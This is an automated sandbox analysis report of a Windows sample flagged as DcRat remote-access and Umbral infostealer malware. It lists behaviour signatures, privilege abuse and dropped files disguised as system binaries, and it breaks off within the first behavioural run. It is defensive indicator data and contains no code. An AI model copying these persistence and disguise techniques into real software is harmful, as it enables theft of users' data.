Malware Analysis Report

2024-10-10 10:09

Sample ID 240503-xvxbwadd8s
Target 898A94F29EDC228CE3BD2054F3D5D6DD.exe
SHA256 a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37
Tags
dcrat umbral evasion infostealer rat stealer execution spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37

Threat Level: Known bad

The file 898A94F29EDC228CE3BD2054F3D5D6DD.exe was found to be: Known bad.

Malicious Activity Summary

dcrat umbral evasion infostealer rat stealer execution spyware

DcRat

Umbral

Detect Umbral payload

Process spawned unexpected child process

DCRat payload

Disables Task Manager via registry modification

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Creates scheduled task(s)

Views/modifies file attributes

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Detects videocard installed

Suspicious use of AdjustPrivilegeToken

Modifies registry key

Suspicious behavior: GetForegroundWindowSpam

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-03 19:11

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-03 19:11

Reported

2024-05-03 19:13

Platform

win7-20240221-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Umbral

stealer umbral

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Disables Task Manager via registry modification

evasion

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft Synchronization Services\088424020bedd6 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\DVD Maker\ja-JP\Inject.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\DVD Maker\ja-JP\652d253fe21f9b C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\Common Files\csrss.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\Common Files\886983d96e3d3e C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\Uninstall Information\csrss.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files\Uninstall Information\886983d96e3d3e C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Microsoft Synchronization Services\conhost.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\en-US\24dbde2999530e C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\schemas\driverBrokercommon.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\schemas\1cdec3972599ff C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\AppPatch\es-ES\explorer.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\AppPatch\es-ES\7a0fd90576e088 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\en-US\WmiPrvSE.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
Token: SeDebugPrivilege N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2236 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\stealer.exe
PID 2236 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\stealer.exe
PID 2236 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\stealer.exe
PID 2236 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\stealer.exe
PID 2236 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
PID 2236 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
PID 2236 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
PID 2236 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
PID 2236 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\Inject.exe
PID 2236 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\Inject.exe
PID 2236 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\Inject.exe
PID 2236 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\Inject.exe
PID 2592 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe
PID 2592 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe
PID 2592 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe
